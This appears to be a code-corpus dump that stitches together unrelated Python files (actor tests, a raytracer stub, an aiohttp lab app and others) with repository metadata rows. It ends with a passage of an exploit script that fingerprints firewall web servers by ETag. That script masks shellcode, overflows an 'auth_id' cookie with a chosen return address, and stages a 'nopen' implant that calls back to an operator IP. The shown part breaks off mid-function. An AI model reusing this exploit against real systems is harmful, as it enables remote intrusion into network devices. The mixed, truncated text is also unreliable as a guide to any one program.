        self.on_failure_was_called.clear()
        self.actor_ref.tell({'command': 'raise exception'})
        self.on_failure_was_called.wait(5)
        self.assertTrue(self.on_failure_was_called.is_set())
        self.log_handler.wait_for_message('error')
        with self.log_handler.lock:
            self.assertEqual(1, len(self.log_handler.messages['error']))
            log_record = self.log_handler.messages['error'][0]
        self.assertEqual(
            'Unhandled exception in %s:' % self.actor_ref,
            log_record.getMessage())
        self.assertEqual(Exception, log_record.exc_info[0])
        self.assertEqual('foo', str(log_record.exc_info[1]))
    def test_base_exception_is_logged(self):
        # BaseException should stop all actors, producing three debug lines.
        self.log_handler.reset()
        self.on_stop_was_called.clear()
        self.actor_ref.tell({'command': 'raise base exception'})
        self.on_stop_was_called.wait(5)
        self.assertTrue(self.on_stop_was_called.is_set())
        self.log_handler.wait_for_message('debug', num_messages=3)
        with self.log_handler.lock:
            self.assertEqual(3, len(self.log_handler.messages['debug']))
            log_record = self.log_handler.messages['debug'][0]
        self.assertEqual(
            'BaseException() in %s. Stopping all actors.' % self.actor_ref,
            log_record.getMessage())
    def test_exception_in_on_start_is_logged(self):
        self.log_handler.reset()
        start_event = self.event_class()
        actor_ref = self.EarlyFailingActor.start(start_event)
        start_event.wait(5)
        self.log_handler.wait_for_message('error')
        with self.log_handler.lock:
            self.assertEqual(1, len(self.log_handler.messages['error']))
            log_record = self.log_handler.messages['error'][0]
        self.assertEqual(
            'Unhandled exception in %s:' % actor_ref,
            log_record.getMessage())
    def test_exception_in_on_stop_is_logged(self):
        self.log_handler.reset()
        stop_event = self.event_class()
        actor_ref = self.LateFailingActor.start(stop_event)
        stop_event.wait(5)
        self.log_handler.wait_for_message('error')
        with self.log_handler.lock:
            self.assertEqual(1, len(self.log_handler.messages['error']))
            log_record = self.log_handler.messages['error'][0]
        self.assertEqual(
            'Unhandled exception in %s:' % actor_ref,
            log_record.getMessage())
    def test_exception_in_on_failure_is_logged(self):
        # Both the original failure and the on_failure failure are logged.
        self.log_handler.reset()
        failure_event = self.event_class()
        actor_ref = self.FailingOnFailureActor.start(failure_event)
        actor_ref.tell({'command': 'raise exception'})
        failure_event.wait(5)
        self.log_handler.wait_for_message('error', num_messages=2)
        with self.log_handler.lock:
            self.assertEqual(2, len(self.log_handler.messages['error']))
            log_record = self.log_handler.messages['error'][0]
        self.assertEqual(
            'Unhandled exception in %s:' % actor_ref,
            log_record.getMessage())
class AnActor(object):
    """Actor mixin that signals lifecycle events and can raise on command.

    `on_stop` / `on_failure` set the events handed to the constructor;
    `on_receive` raises Exception('foo') or a bare BaseException when told
    to, and otherwise defers to the next class in the MRO.
    """
    def __init__(self, on_stop_was_called, on_failure_was_called):
        super(AnActor, self).__init__()
        self.on_stop_was_called = on_stop_was_called
        self.on_failure_was_called = on_failure_was_called
    def on_stop(self):
        self.on_stop_was_called.set()
    def on_failure(self, exception_type, exception_value, traceback):
        self.on_failure_was_called.set()
    def on_receive(self, message):
        command = message.get('command')
        if command == 'raise exception':
            return self.raise_exception()
        if command == 'raise base exception':
            raise BaseException()
        # Anything else is an unexpected message for the backend to handle.
        super(AnActor, self).on_receive(message)
    def raise_exception(self):
        raise Exception('foo')
def ConcreteActorLoggingTest(actor_class, event_class):
    """Build a concrete TestCase binding ActorLoggingTest to one backend.

    `actor_class` is the backend base (e.g. ThreadingActor) and
    `event_class` its matching event type; the helper mixes each test
    actor with the backend and renames the class for readable output.
    """
    class C(ActorLoggingTest, unittest.TestCase):
        class AnActor(AnActor, actor_class):
            pass
        class EarlyFailingActor(EarlyFailingActor, actor_class):
            pass
        class LateFailingActor(LateFailingActor, actor_class):
            pass
        class FailingOnFailureActor(FailingOnFailureActor, actor_class):
            pass
    C.event_class = event_class
    # Name the suite after the backend, e.g. "ThreadingActorLoggingTest".
    C.__name__ = '%sLoggingTest' % actor_class.__name__
    return C
# The threading backend is always available.
ThreadingActorLoggingTest = ConcreteActorLoggingTest(
    ThreadingActor, threading.Event)
# Optional backends: only generate these suites when the corresponding
# third-party package is installed.
try:
    import gevent.event
    from pykka.gevent import GeventActor
    GeventActorLoggingTest = ConcreteActorLoggingTest(
        GeventActor, gevent.event.Event)
except ImportError:
    pass
try:
    from pykka.eventlet import EventletActor, EventletEvent
    EventletActorLoggingTest = ConcreteActorLoggingTest(
        EventletActor, EventletEvent)
except ImportError:
    pass
| 36.01 | 75 | 0.67509 | 6,319 | 0.877395 | 0 | 0 | 0 | 0 | 0 | 0 | 622 | 0.086365 |
a4e00d2cb49985d38fa9a42e89c6babd42a14602 | 190 | py | Python | ldaptor/apps/webui/i18n.py | tv42/ldaptor | 3f227602c8c021b9e943136a2dc8d7db44a11e50 | [
"MIT"
] | 1 | 2015-11-25T04:01:26.000Z | 2015-11-25T04:01:26.000Z | ldaptor/apps/webui/i18n.py | tv42/ldaptor | 3f227602c8c021b9e943136a2dc8d7db44a11e50 | [
"MIT"
] | null | null | null | ldaptor/apps/webui/i18n.py | tv42/ldaptor | 3f227602c8c021b9e943136a2dc8d7db44a11e50 | [
"MIT"
] | 2 | 2019-11-06T02:14:10.000Z | 2022-01-10T08:34:11.000Z | from nevow.inevow import ILanguages
from nevow.i18n import I18NConfig
from nevow import i18n
# Module-wide translator bound to the ldaptor-webui gettext domain.
_ = i18n.Translator(domain='ldaptor-webui')
def render():
    """Return a nevow i18n renderer that uses this module's translator."""
    return i18n.render(translator=_)
| 21.111111 | 43 | 0.778947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.078947 |
a4e1d55175b32d5385828a34b15cc230ebdc6f9d | 2,026 | py | Python | surface_integrator/photonmap.py | neodyme60/raypy | a898ba46e07ba299fcb1729dca45abdc1e944f83 | [
"MIT"
] | 1 | 2018-05-15T04:00:17.000Z | 2018-05-15T04:00:17.000Z | surface_integrator/photonmap.py | neodyme60/raypy | a898ba46e07ba299fcb1729dca45abdc1e944f83 | [
"MIT"
] | null | null | null | surface_integrator/photonmap.py | neodyme60/raypy | a898ba46e07ba299fcb1729dca45abdc1e944f83 | [
"MIT"
] | null | null | null | import math
from scipy.spatial.ckdtree import cKDTree
from core.camera import Camera
from core.intersection import Intersection
from core.ray import Ray
from core.renderer import Renderer
from core.sample import Sample
from core.sampler import Sampler
from core.scene import Scene
from core.spectrum import Spectrum
from core.surface_integrator import SurfaceIntegrator
from maths.point3d import Point3d
from maths.vector3d import Vector3d
class Photon():
    """A single stored photon deposit used by the photon-mapping integrator."""
    def __init__(self, p: Point3d, alpha: Spectrum, wi: Vector3d):
        # Hit position.
        self.p = p
        # Carried power/weight spectrum.
        self.alpha = alpha
        # Incident direction at the hit.
        self.wi = wi
class KdTreePhoton:
    """Holder for a photon kd-tree; empty until the map is built."""
    def __init__(self):
        # Presumably a scipy cKDTree once populated (see module import);
        # nothing in this chunk constructs it - TODO confirm at build site.
        self.tree = None
# PhotonIntegrator Local Declarations
class PhotonIntegrator(SurfaceIntegrator):
    """Photon-mapping surface integrator (skeleton).

    Stores the photon-shooting parameters; Li/Preprocess/RequestSamples
    currently just delegate to the SurfaceIntegrator base class.
    """
    def __init__(self, ncaus: int, nind: int, nl: int, mdepth: int, mphodepth: int, mdist: float, fg: bool, gs: int, ga: float):
        super().__init__()
        # Photon budgets and lookup size.
        self.nCausticPhotonsWanted = ncaus
        self.nIndirectPhotonsWanted = nind
        self.nLookup = nl
        # Recursion limits for specular bounces and photon paths.
        self.maxSpecularDepth = mdepth
        self.maxPhotonDepth = mphodepth
        # Search radius is supplied as a distance; stored squared.
        self.maxDistSquared = mdist * mdist
        # Final-gather settings; `ga` arrives in degrees.
        self.finalGather = fg
        self.cosGatherAngle = math.cos(math.radians(ga))
        self.gatherSamples = gs
        self.nCausticPaths = 0
        self.nIndirectPaths = 0
        self.lightSampleOffsets = None
        self.bsdfSampleOffsets = None
        # The three photon maps, filled in during preprocessing.
        self.causticMap = KdTreePhoton()
        self.indirectMap = KdTreePhoton()
        self.radianceMap = KdTreePhoton()
    def Li(self, scene, renderer: Renderer, ray: Ray, intersection: Intersection, sample: Sample) -> Spectrum:
        # Not yet implemented: falls back to the base-class behaviour.
        return super().Li(scene, renderer, ray, intersection, sample)
    def Preprocess(self, scene: Scene, camera: Camera, renderer: Renderer):
        # Not yet implemented: photon shooting would happen here.
        super().Preprocess(scene, camera, renderer)
    def RequestSamples(self, sampler: Sampler, sample: Sample, scene: Scene):
        super().RequestSamples(sampler, sample, scene)
| 34.338983 | 129 | 0.681145 | 1,514 | 0.747285 | 0 | 0 | 0 | 0 | 0 | 0 | 38 | 0.018756 |
a4e4663d3202bce0ac276499c4caa3af243144cc | 1,831 | py | Python | bspump/declarative/expression/datastructs/itemexpr.py | chinese-soup/BitSwanPump | 6ef71577cc1f166cff80876d28be37c791061bd2 | [
"BSD-3-Clause"
] | 1 | 2020-08-20T12:56:58.000Z | 2020-08-20T12:56:58.000Z | bspump/declarative/expression/datastructs/itemexpr.py | chinese-soup/BitSwanPump | 6ef71577cc1f166cff80876d28be37c791061bd2 | [
"BSD-3-Clause"
] | null | null | null | bspump/declarative/expression/datastructs/itemexpr.py | chinese-soup/BitSwanPump | 6ef71577cc1f166cff80876d28be37c791061bd2 | [
"BSD-3-Clause"
] | null | null | null | from ...abc import Expression, evaluate
from ..value.eventexpr import EVENT
from ..value.eventexpr import KWARGS
from ..value.eventexpr import ARG
from ..value.valueexpr import VALUE
from ..utility.context import CONTEXT
class ITEM(Expression):
    """
    Get the item from a dictionary.

    There are two forms:

    1) Mapping form

    !ITEM
    with: !EVENT
    item: foo
    default: 0

    2) Scalar form

    !ITEM EVENT potatoes

    Scalar form has some limitations (e.g no default value) but it is more compact
    """

    def __init__(self, app, *, arg_with=None, arg_item=None, arg_default=None, value=None):
        super().__init__(app)
        if value is not None:
            # Scalar form: "<SOURCE> <item>", e.g. "EVENT potatoes".
            # Split only on the first space: the previous maxsplit of 2
            # produced three parts (and a ValueError on unpacking) when
            # the item itself contained a space.
            with_, item = value.split(' ', 1)
            with_ = with_.upper()
            if with_ == 'EVENT':
                self.With = EVENT(app, value='')
            elif with_ == 'CONTEXT':
                self.With = CONTEXT(app, value='')
            elif with_ == 'KWARGS':
                self.With = KWARGS(app, value='')
            elif with_ == 'ARG':
                self.With = ARG(app, value='')
            else:
                # Fixed: the offending value is now interpolated into the
                # message (previously `format(with_)` was passed as a
                # second RuntimeError argument and never substituted).
                raise RuntimeError(
                    "Invalid item argument '{}' - must be EVENT, CONTEXT, KWARGS, ARG".format(with_))
            self.Item = VALUE(app, value=item)
            # Scalar form cannot carry a default.
            self.Default = None
        else:
            # Mapping form: all operands supplied explicitly.
            self.With = arg_with
            self.Item = arg_item
            self.Default = arg_default

    def __call__(self, context, event, *args, **kwargs):
        """Evaluate the lookup; on a missing key/index return the evaluated
        default, or None when no default was configured."""
        with_dict = evaluate(self.With, context, event, *args, **kwargs)
        item = evaluate(self.Item, context, event, *args, **kwargs)
        try:
            if '.' in item:
                # Dotted item drills through nested dictionaries.
                value = with_dict
                for part in item.split('.'):
                    value = value[part]
            else:
                value = with_dict[item]
        except (KeyError, IndexError):
            # Single handler replaces two identical except blocks.
            if self.Default is None:
                return None
            return evaluate(self.Default, context, event, *args, **kwargs)
        return value
| 23.474359 | 105 | 0.670126 | 1,606 | 0.877116 | 0 | 0 | 0 | 0 | 0 | 0 | 373 | 0.203714 |
a4e4e36e2de9d52f611d5fad94945eb66a5be6ca | 821 | py | Python | aula10/ex2.py | Vanderluizsj/AulasPython | a4732b3fc524cabb673f6dbfd610975935b67916 | [
"MIT"
] | null | null | null | aula10/ex2.py | Vanderluizsj/AulasPython | a4732b3fc524cabb673f6dbfd610975935b67916 | [
"MIT"
] | null | null | null | aula10/ex2.py | Vanderluizsj/AulasPython | a4732b3fc524cabb673f6dbfd610975935b67916 | [
"MIT"
] | null | null | null | """
Faça um programa que pergunte a hora ao usuário e, baseando-se na hora descrita,
exiba a saudação apropriada.
"""
# Loop until a valid hour has been greeted.
while True:
    # Read the hour; only an integer is accepted.  Narrowing the former
    # bare `except:` to ValueError stops it from swallowing unrelated
    # errors (including KeyboardInterrupt).
    try:
        horas = int(input('Que horas são? '))
    except ValueError:
        print("Digite apenas o numero correspondente a hora.")
        continue
    if 0 <= horas <= 11:
        print('Bom dia!')
        break
    elif 12 <= horas <= 17:
        print('Boa tarde!')
        break
    # The original condition was `>=13`, but 13-17 is already consumed by
    # the branch above, so evening effectively started at 18; made explicit.
    elif 18 <= horas <= 23:
        print('Boa noite!')
        break
    else:
        # Hour above 23 or below 0: prompt again.
        print("Digite uma hora entre 0 e 23.")
| 31.576923 | 91 | 0.588307 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 470 | 0.568319 |
a4e6cba016dd1e2cdd954469d0530a12f290140c | 4,137 | py | Python | lab07/app.py | mocurin/ITIS | e7e7c2a00c591ccb318fd0aaa93f426f6e2b8a3f | [
"MIT"
] | null | null | null | lab07/app.py | mocurin/ITIS | e7e7c2a00c591ccb318fd0aaa93f426f6e2b8a3f | [
"MIT"
] | null | null | null | lab07/app.py | mocurin/ITIS | e7e7c2a00c591ccb318fd0aaa93f426f6e2b8a3f | [
"MIT"
] | null | null | null | import aiohttp_jinja2
import jinja2
import secrets
import random
from aiohttp import web
from aiohttp.client import MultiDict
from source import fit_model, vectorize, model_predict
routes = web.RouteTableDef()
# Server location used to build absolute redirect URLs.
PORT = 8080
base_url = f"http://localhost:{PORT}"
# Defaults: number of training images and grid size (X columns, Y rows).
IMGS, X, Y = 3, 5, 7
# Default pixel-flip probability for the "randomize" option.
THRESH = 0.1
# token -> ((x, y, imgs), training images, fitted weights)
networks = {}
@routes.get('/')
async def setup(request: web.Request):
    """Entry point: redirect to the fit page with the default dimensions."""
    raise web.HTTPFound(location=f"{base_url}/fit/{IMGS}:{X}-{Y}")
@routes.get('/fit/{imgs}:{x}-{y}')
@aiohttp_jinja2.template('fit.html')
async def web_fit(request: web.Request):
    """Render the training grid page for `imgs` images of size x-by-y."""
    imgs = request.match_info['imgs']
    x = request.match_info['x']
    y = request.match_info['y']
    # Path parts arrive as strings; the template expects ints.
    return {
        'base_url': base_url,
        'imgs': int(imgs),
        'x': int(x),
        'y': int(y),
    }
@routes.post('/change')
async def change_dim(request: web.Request):
    """Redirect to the fit page for the posted dimensions."""
    data = await request.post()
    # Empty form fields are falsy strings, so `or` substitutes the defaults.
    raise web.HTTPFound(location=f"{base_url}/fit/{data['imgs'] or IMGS}:{data['x'] or X}-{data['y'] or Y}")
def _create_images(x, y, imgs, data):
    """Build `imgs` bipolar x-by-y images from checkbox form keys "k:i-j".

    Every cell starts at -1; each submitted key flips one cell of one
    image to 1.  Returns the vectorized form of every image.
    """
    images = [[[-1] * x for _ in range(y)] for _ in range(imgs)]
    for raw_key in data.keys():
        img_no, cell = raw_key.split(':')
        col, row = cell.split('-')
        images[int(img_no)][int(row)][int(col)] = 1
    return [vectorize(image) for image in images]
def _create_image(x, y, data):
    """Build one bipolar (-1/+1) pixel grid of size x*y from posted checkbox
    keys of the form ``"<col>-<row>"`` and return its vectorized form."""
    grid = [[-1] * x for _ in range(y)]
    for raw_key in data.keys():
        col, row = raw_key.split('-')
        # Checked checkboxes flip the corresponding pixel to +1.
        grid[int(row)][int(col)] = 1
    return vectorize(grid)
@routes.post('/fit')
async def fit(request: web.Request):
    """Train a model from the posted image grids and redirect to its predict page."""
    data = await request.post()
    data = MultiDict(data)
    imgs = data.pop('imgs')
    imgs = int(imgs)
    # Validate the number of training images
    if imgs < 0:
        raise web.HTTPBadRequest(text=f"Invalid images number: {imgs}")
    x = data.pop('x')
    x = int(x)
    y = data.pop('y')
    y = int(y)
    # Validate the image dimensions
    if x * y < 15 or x * y > 50:
        raise web.HTTPBadRequest(text=f"Invalid XY combination: X={x}, Y={y}, XY={x * y}")
    # Build the pixel matrices for all images
    images = _create_images(x, y, imgs, data)
    # Store dimensions, training images and fitted weights under a fresh token
    token = secrets.token_hex(8)
    networks[token] = ((x, y, imgs), images, fit_model(images))
    raise web.HTTPFound(location=f"{base_url}/predict/{token}")
@routes.get('/weights/{token}')
async def get_weights(request: web.Request):
    """Return the fitted weights for `token` as plain text."""
    token = request.match_info['token']
    # aiohttp HTTP responses are exception subclasses; raising HTTPOk sends a 200.
    raise web.HTTPOk(text=str(networks[token][-1]))
@routes.get('/predict/{token}')
@aiohttp_jinja2.template('predict.html')
async def web_predict(request: web.Request):
    """Render the prediction page for the network identified by `token`.

    Shows one randomly chosen training image; the optional ``randomize``
    query parameter (float in [0, 1]) gives a per-pixel flip probability.
    Unparseable floats silently fall back to THRESH; out-of-range values
    are rejected with HTTP 400.
    """
    token = request.match_info['token']
    randomize = request.url.query.get('randomize') or THRESH
    try:
        randomize = float(randomize)
    except ValueError:
        randomize = THRESH
    if randomize < 0. or randomize > 1.:
        # BUG FIX: the original interpolated the undefined name `by` here,
        # raising NameError instead of the intended HTTP 400 response.
        raise web.HTTPBadRequest(
            text=f"Probability value exceeds [0, 1] limits: randomize={randomize}")
    (x, y, imgs), images, weights = networks[token]
    # Randomly flip pixels if the option was supplied in the query string
    # (pixels are bipolar -1/+1, so a flip is simple negation).
    if request.url.query.get('randomize'):
        images = [[-val if random.random() < randomize else val
                   for val in im]
                  for im in images]
    im_idx = random.randrange(0, imgs)
    return {
        'x': x,
        'y': y,
        'image': images[im_idx],
        'token': token,
        'randomize': randomize
    }
@routes.post('/predict/{token}')
@aiohttp_jinja2.template('result.html')
async def predict(request: web.Request):
    """Run the stored model for `token` on the submitted image and render the result."""
    token = request.match_info['token']
    data = await request.post()
    (x, y, _), images, weights = networks[token]
    image = _create_image(x, y, data)
    output, state = model_predict(weights, images, image)
    return {
        'x': x,
        'y': y,
        'input': image,
        'output': output,
        'state': int(state)
    }
def create():
    """Build the aiohttp application, register routes and templates, and run it."""
    app = web.Application()
    app.add_routes(routes)
    # Template path is relative to the process working directory.
    aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader('lab07/templates'))
    web.run_app(app, port=PORT)
# Script entry point: start the web server.
if __name__ == '__main__':
    create()
| 23.505682 | 108 | 0.603336 | 0 | 0 | 0 | 0 | 3,100 | 0.729069 | 2,788 | 0.655691 | 868 | 0.204139 |
a4e6cbc17c5cb30d02c5c8a3916b9fbf0b7665a7 | 343 | py | Python | ex6.py | EiPoPoAung/python_exercises | e7c7b67e0409f6680ea7f580e3d1b21d6f96248d | [
"MIT"
] | null | null | null | ex6.py | EiPoPoAung/python_exercises | e7c7b67e0409f6680ea7f580e3d1b21d6f96248d | [
"MIT"
] | null | null | null | ex6.py | EiPoPoAung/python_exercises | e7c7b67e0409f6680ea7f580e3d1b21d6f96248d | [
"MIT"
] | null | null | null | x="There are %d types of people."%10
# Exercise: string interpolation with %s/%r and simple concatenation.
word_one = "binary"
word_two = "don't"
y = "Those who know %s and those who %s." % (word_one, word_two)
print(x)  # `x` is defined earlier in the script
print(y)
print("I said: '%s'." % y)
hilarious = False
joke_evaluation = "Isn't that joke so funny?! %r"
print(joke_evaluation % hilarious)
left_half = "This is the left side of ..."
right_half = "a string with a right side"
print(left_half + right_half)
| 24.5 | 55 | 0.688047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.54519 |
a4e6ff7ac122d6aad3364816354813061bd2f7d4 | 627 | py | Python | logic/config.py | ssichynskyi/lotti-karotti-calc | 44eb39ce4c4bc8ddf4049d72268597c6d7411f84 | [
"Apache-2.0"
] | null | null | null | logic/config.py | ssichynskyi/lotti-karotti-calc | 44eb39ce4c4bc8ddf4049d72268597c6d7411f84 | [
"Apache-2.0"
] | null | null | null | logic/config.py | ssichynskyi/lotti-karotti-calc | 44eb39ce4c4bc8ddf4049d72268597c6d7411f84 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import sys
from pathlib import Path
import yaml
class Config:
"""
Extracts the data from the configuration file given
"""
def __init__(self, path):
with open(path, 'r') as f:
contents = f.read()
self.options = yaml.safe_load(contents)
path_to_config = Path(__file__).parent.parent.joinpath('config', 'lotti_config.yaml')
if not path_to_config.exists():
# handle a case when pyinstaller compile everything in one executable file
path_to_config = Path(sys.argv[0]).parent.joinpath('config', 'lotti_config.yaml')
config = Config(path_to_config)
| 27.26087 | 85 | 0.682616 | 234 | 0.373206 | 0 | 0 | 0 | 0 | 0 | 0 | 221 | 0.352472 |
a4e76062bd271f3f1cc37a95b088bfcb694c00bc | 217 | py | Python | hs_modflow_modelinstance/admin.py | ResearchSoftwareInstitute/MyHPOM | 2d48fe5ac8d21173b1685eb33059bb391fe24414 | [
"BSD-3-Clause"
] | 1 | 2018-09-17T13:07:29.000Z | 2018-09-17T13:07:29.000Z | hs_modflow_modelinstance/admin.py | ResearchSoftwareInstitute/MyHPOM | 2d48fe5ac8d21173b1685eb33059bb391fe24414 | [
"BSD-3-Clause"
] | 100 | 2017-08-01T23:48:04.000Z | 2018-04-03T13:17:27.000Z | hs_modflow_modelinstance/admin.py | ResearchSoftwareInstitute/MyHPOM | 2d48fe5ac8d21173b1685eb33059bb391fe24414 | [
"BSD-3-Clause"
] | 2 | 2017-07-27T20:41:33.000Z | 2017-07-27T22:40:57.000Z | from mezzanine.pages.admin import PageAdmin
from django.contrib import admin
from hs_modflow_modelinstance.models import MODFLOWModelInstanceResource
# Register the MODFLOW model instance resource with the Django admin,
# using Mezzanine's stock PageAdmin for its edit interface.
admin.site.register(MODFLOWModelInstanceResource, PageAdmin)
| 36.166667 | 73 | 0.866359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
a4e869698fe814d3a243ff2da3c5d64b703b2798 | 24,526 | py | Python | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 46 | 2017-05-15T11:15:08.000Z | 2018-07-02T03:32:52.000Z | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | null | null | null | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 24 | 2017-05-17T03:26:17.000Z | 2018-07-09T07:00:50.000Z | #!/usr/bin/python
import shellcode
import optparse
import httplib
import logging
import random
import socket
import sys
import re
from struct import pack, unpack
from time import sleep
########################
# Global configuration #
########################
# Per-target configuration file holding ETAG / NOSERVER / SCANPLAN lines.
DEFAULT_ETAG_FILE = "ELBO.config"
# Version string for optparse ("%prog" expands to the script name).
VERSION = "%prog v1.0.0.0"
####################################################################
# Add support for python 2.3 and 2.4 #
####################################################################
# 2.3 introduced Set, so anything older won't work anyway
# 2.4 introduced the set builtin, so anything newer works fine
# Python <= 2.3: the "set" builtin does not exist yet; alias sets.Set.
if sys.version_info[0] <= 2 and sys.version_info[1] <= 3:
    import sets
    set = sets.Set
# "any" was introduced in 2.5
if sys.version_info[0] == 2 and sys.version_info[1] < 5:
    def any(iterable):
        # Backport: True as soon as one element is truthy, else False.
        for e in iterable:
            if e:
                return True
        return False
#####################
# Support functions #
#####################
def read_etag_file(options):
    """Parse the ELBO configuration file named by options.etag_file.

    Recognized line formats (after stripping '#' comments and blanks):
      ETAG     = <etag> : <action> [: <stack> [: <version>]]
      NOSERVER = <path>
      SCANPLAN = <action> : <low> : <high> : <addr>[,<addr>...]

    Side effect: fills options.scanplan with {action, stack} dicts from
    every SCANPLAN whose [low, high] timestamp range contains the
    timestamp component of options.etag.  Exits the process on any
    malformed line.

    Returns (tags, noserver) where tags maps etag-string to a list of
    {action, stack, version} dicts and noserver is the configured
    noserver path (or None).
    """
    tags = dict()
    noserver = None
    have_errors = False
    options.scanplan = []
    # split etag into its components (all three fields are hex)
    (inode, size, timestamp) = [int(x, 16) for x in options.etag.split("-")]
    logging.info("Parsed ETag: inode=%d, filesize=%d, timestamp=%#x" %
                 (inode, size, timestamp))
    fh = file(options.etag_file)
    for line in [x.strip() for x in fh.readlines()]:
        line = re.sub("\s*#.*", "", line) # remove trailing comments
        if len(line) == 0: continue # skip blank lines
        m1 = re.match("ETAG\s*=\s*(.+)", line)
        m2 = re.match("NOSERVER\s*=\s*(.+)", line)
        m3 = re.match("SCANPLAN\s*=\s*(.+)", line)
        if not (m1 or m2 or m3):
            print "ERROR: invalid line in etag file: [%s]" % line
            have_errors = True
            continue
        if m1: # an "ETAG = ..." line
            # zip truncates, so a 3-field line simply omits "version"
            fields = dict(zip(["etag", "action", "stack", "version"],
                              [x.strip() for x in m1.group(1).split(":")]))
            if len(fields) == 3:
                fields["version"] = "unknown"
            elif len(fields) != 4:
                print "ERROR: invalid line in etag file: [%s]" % line
                have_errors = True
                continue
            # skip actions that don't match the --action command line argument
            if options.action not in fields["action"]:
                logging.debug("Skipping configuration [%s:%s] due to --action" %
                              (fields["etag"], fields["action"]))
                continue
            # convert hex numbers to actual numbers (not strings)
            if fields["stack"].startswith("0x"):
                fields["stack"] = long(fields["stack"], 16)
            if fields["etag"] not in tags:
                tags[fields["etag"]] = []
            tags[fields["etag"]].append(dict(action=fields["action"],
                                             stack=fields["stack"],
                                             version=fields["version"]))
        elif m2: # a "NOSERVER = ..." line
            noserver = m2.group(1)
        elif m3: # a "SCANPLAN = ..." line
            fields = dict(zip(["action","low","high","addrs"],
                              [x.strip() for x in m3.group(1).split(":")]))
            if options.action not in fields["action"]:
                logging.debug("Skipping scanplan [%s:%s:%s] due to --action" %
                              (fields["action"], fields["low"], fields["high"]))
                continue
            fields["low"] = long(fields["low"], 16)
            fields["high"] = long(fields["high"], 16)
            addrs = [x.strip() for x in fields["addrs"].split(",")]
            # addresses are either hex numbers or symbolic names (e.g. libc.0)
            addrs = [x.startswith("0x") and long(x,16) or x for x in addrs]
            # if the etag we want to hit is in this SCANPLAN, add it
            if timestamp >= fields["low"] and timestamp <= fields["high"]:
                scanplan = [dict(action=fields["action"], stack=x)
                            for x in addrs]
                if options.maxfailsaction > 0:
                    options.scanplan += scanplan[:options.maxfailsaction]
                else:
                    options.scanplan += scanplan
    fh.close()
    if have_errors:
        sys.exit(1)
    return (tags, noserver)
def get_details_for_etag(options):
"""Get the stack address for a specific ETag from the configuration file."""
(tags, noserver) = read_etag_file(options)
if noserver and not options.noserver:
options.noserver = noserver
# strip off wacky W/ and quotes (if they're there)
m = re.match('(?:W/)?"?(.*)"?$', options.etag)
if m:
options.etag = m.group(1)
etag = options.etag
# look for an exact match
if etag in tags:
print "Found etag [%s] for version %s" % (etag,tags[etag][0]['version'])
return tags[etag]
# didn't find exact match - strip off the inode part and check again
short = etag[etag.index("-"):]
for t in tags:
if t.find(short) != -1:
print "Partial ETag match: [%s],[%s] for version %s" % \
(etag, t, tags[t][0]['version'])
return tags[t]
return None
def encode(string):
    """XOR-mask `string` with a single byte so the result contains none of
    the characters forbidden in the HTTP request (NUL and whitespace).

    Returns (mask_byte, masked_string); raises if no usable mask exists."""
    forbidden = ['\x00', '\t', ' ', '\r', '\n']
    start = random.randint(1, 255)
    mask = (start + 1) & 0xff
    # Walk the byte space from a random starting point, wrapping around.
    while mask != start:
        # The mask byte itself travels with the payload, so it must be clean.
        if chr(mask) in forbidden:
            mask = (mask + 1) & 0xff
            continue
        masked = "".join([chr(mask ^ ord(ch)) for ch in string])
        # Accept the first mask that leaves no forbidden byte in the output.
        if not [ch for ch in forbidden if ch in masked]:
            return (mask, masked)
        mask = (mask + 1) & 0xff
    raise Exception("Could not find valid mask byte.")
def build_payload(options, address, libc):
    """Build the exploit cookie + post data payload.

    `address` is the return address written after the overflow; `libc`
    selects the short return-to-libc cookie (auth_id, <= 60 bytes) versus
    the full finder/decoder/execute stack-shellcode cookie (<= 1036 bytes).
    The POST body is chosen by options.op (scan/nopen/cleanup).
    Returns (cookie, body).
    """
    if options.op == "scan":
        body = shellcode.probe
    elif options.op == "nopen":
        body = shellcode.nopen
        # fill in noserver file length and callback ip/port
        body = body[:2] + \
               pack("<I", len(shellcode.tiny_exec)) + \
               pack("<I", len(options.nopen)) + \
               pack("35s", "D=-c%s" % options.callback_ip) + \
               body[45:]
    elif options.op == "cleanup":
        body = shellcode.cleanup
    else:
        raise Exception("ERROR: Invalid operation specified.")
    if libc:
        cookie = shellcode.auth_id
        bodylen = len(body)
        if bodylen > 0xffff:
            raise Exception("body must be <= 0xffff bytes long")
        # fill in bodylen in auth_id shellcode; a zero byte in either half
        # is replaced with NOPs since NUL cannot appear in the cookie
        if (bodylen & 0xff00) == 0:
            cookie = cookie[:10] + "\x90\x90" + cookie[12:]
        else:
            cookie = cookie[:11] + chr((bodylen & 0xff00) >> 8) + cookie[12:]
        if (bodylen & 0xff) == 0:
            cookie = cookie[:12] + "\x90\x90" + cookie[14:]
        else:
            cookie = cookie[:13] + chr(bodylen & 0xff) + cookie[14:]
        if len(cookie) > 60:
            raise Exception("ERROR: Cookie shellcode must be <= 60 bytes!")
        # pad to exactly 60 bytes with NOPs, then append the return address
        cookie = "auth_id=" + chr(0x90)*(60 - len(cookie)) + cookie
        cookie += pack("<I", address)
    else:
        decoder = shellcode.decoder
        execute = shellcode.execute_post
        exec_len = pack("<I", len(execute))
        deco_len = pack("<I", len(decoder))
        body_len = pack("<I", len(body))
        # replace 0xdeadbeef with actual body length
        execute = execute[:7] + body_len + execute[11:]
        # XOR-mask the execute stage plus its trailing length words so the
        # cookie contains no forbidden HTTP characters
        (maskb, string) = encode(execute + exec_len + deco_len)
        execute = string[:-8]
        exec_len = string[-8:-4]
        deco_len = string[-4:]
        maskw = chr(maskb)*4
